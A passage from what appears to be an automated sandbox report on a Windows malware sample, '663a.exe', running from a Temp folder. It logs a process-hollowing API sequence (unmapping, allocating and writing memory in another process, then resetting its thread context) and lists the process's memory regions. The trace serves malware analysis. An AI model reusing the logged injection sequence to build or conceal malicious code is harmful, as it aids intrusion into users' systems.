[434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0149.574] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18bfc8, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18bfc8*, lpNumberOfBytesRead=0x0) returned 1 [0149.574] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0149.580] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0149.581] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x215a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x215a0*, NumberOfBytesWritten=0x0) returned 0x0 [0149.643] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x217a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x217a0*, NumberOfBytesWritten=0x0) returned 0x0 [0149.646] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x21654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x21654*, lpNumberOfBytesWritten=0x0) returned 1 [0149.646] SetThreadContext (hThread=0x74, lpContext=0x220000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0149.647] ResumeThread (hThread=0x74) returned 0x1 [0149.647] CloseHandle (hObject=0x74) returned 1 [0149.647] CloseHandle (hObject=0x78) returned 1 [0149.647] ExitProcess (uExitCode=0x0) [0149.647] HeapValidate (hHeap=0x290000, dwFlags=0x0, lpMem=0x2907d0) returned 1 [0149.647] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2907d0 | out: hHeap=0x290000) returned 1 Process: id = "7" image_name = "663a.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.exe" page_root = "0xb0b1000" os_pid = "0xeb4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x390" cmd_line = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" cur_dir = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1859 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1860 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1861 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1862 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1863 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1864 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1865 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1866 start_va = 0x400000 end_va = 0x95efff monitored = 1 entry_point = 0x424000 region_type = mapped_file name = "663a.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.exe") Region: id = 1867 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1868 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1869 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1870 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1871 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1872 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1873 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1874 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1875 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1876 start_va = 0x1c0000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1877 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1878 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1879 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1880 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1881 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1882 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1883 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1884 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1885 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1886 start_va = 0x240000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1887 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1888 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1889 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1890 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1891 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1892 start_va = 0x350000 end_va = 0x3b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1893 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1894 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1895 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1896 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1897 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1898 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1899 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1900 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1901 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1902 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1903 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1908 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1909 start_va = 0x960000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1910 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1911 start_va = 0x960000 end_va = 0xae7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1912 start_va = 0xb30000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 1913 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1914 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1915 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1916 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1917 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1918 start_va = 0xb40000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1919 start_va = 0xcd0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 1922 start_va = 0x20d0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1923 start_va = 0x2130000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1924 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1925 start_va = 0x20d0000 end_va = 0x2114fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1926 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1927 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1928 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1929 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1937 start_va = 0x75400000 end_va = 0x75406fff monitored = 0 entry_point = 0x75401120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 1938 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1939 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1940 start_va = 0x2190000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 1941 start_va = 0x2190000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 1942 start_va = 0x2380000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1943 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1944 start_va = 0x23c0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 1945 start_va = 0x2290000 end_va = 0x236efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002290000" filename = "" Region: id = 1946 start_va = 0x24c0000 end_va = 0x278efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1947 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1948 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1949 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1950 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1951 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename 